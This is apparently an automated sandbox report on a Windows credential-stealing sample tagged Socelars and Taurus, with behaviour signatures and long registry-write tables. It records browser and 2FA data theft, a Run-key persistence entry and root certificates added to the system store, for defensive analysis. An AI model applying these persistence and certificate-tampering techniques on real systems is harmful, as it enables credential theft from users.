Malware Analysis Report

2024-10-19 02:35

Sample ID 220206-qfqr8aadf7
Target 45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c
SHA256 45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c
Tags
socelars taurus discovery persistence spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c

Threat Level: Known bad

The file 45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c was found to be: Known bad.

Malicious Activity Summary

socelars taurus discovery persistence spyware stealer trojan upx

Socelars Payload

Socelars

Taurus Stealer

Taurus Stealer Payload

Executes dropped EXE

UPX packed file

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Accesses 2FA software files, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Runs ping.exe

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-06 13:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-06 13:12

Reported

2022-02-06 13:15

Platform

win7-en-20211208

Max time kernel

153s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"

Signatures

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Taurus Stealer

trojan stealer taurus

Taurus Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe" C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 701611bf631bd801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f302f7a020b975438ea1f1f995ba9783000000000200000000001066000000010000200000002f648492c95554adef85f7a268ff7ba0afadfd014b35473b4a2a082fd474ed31000000000e80000000020000200000003d3c5b50ab37e6fc218c44ef094c6dc5d15d44b5f132094dc247de5dc902b06e9000000041ab3b2f1ce11c920dc78781a948b03382da5c22963870c515eea5cf0230179f5369bf5fabb0cdfd1079a6c5a6284e58fff3f10cd7663bbcf75edee03fb844750e578ed99f11d82c01863828125626936795995a5536f4b8c3b9502f488717c4e8bd1f8f2a5af1ef04bacc2c67cd16650f4d97c43d8aeea628e10bc8929384acc5afbade733e8c09065eb8130f74648240000000f2d07edb5ec720b4b510662cf7ff09369d7f7d48ff81eaa199ce3dce319fa50817c0bd1ab95e40cb2e0ecf7cd0676d69f3a1531a413219de6399ef909bb5cdbc C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "350921742" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D9281271-8756-11EC-A514-46595837F587} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f302f7a020b975438ea1f1f995ba9783000000000200000000001066000000010000200000001a4e9f3712eb5de889121cd3fffd5cded3ca6f3942336b235f9f9a9bd2e6fca7000000000e80000000020000200000000cb3722f65383d4e8feddd84bc0edba9fe078e93b7b05d788aa08fda438a5cad20000000decaf1376415456119728aa1127d17990c580927efc25e5a2f9fe33c1ce3746540000000f264937b1c573bbcda57973a59d156421c2361a24fb562175be3d552a2e07c5fdd76f701c9edc622adced6f5bec400a287d6963be8d16d635b1652edbf88bc04 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D925B111-8756-11EC-A514-46595837F587} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3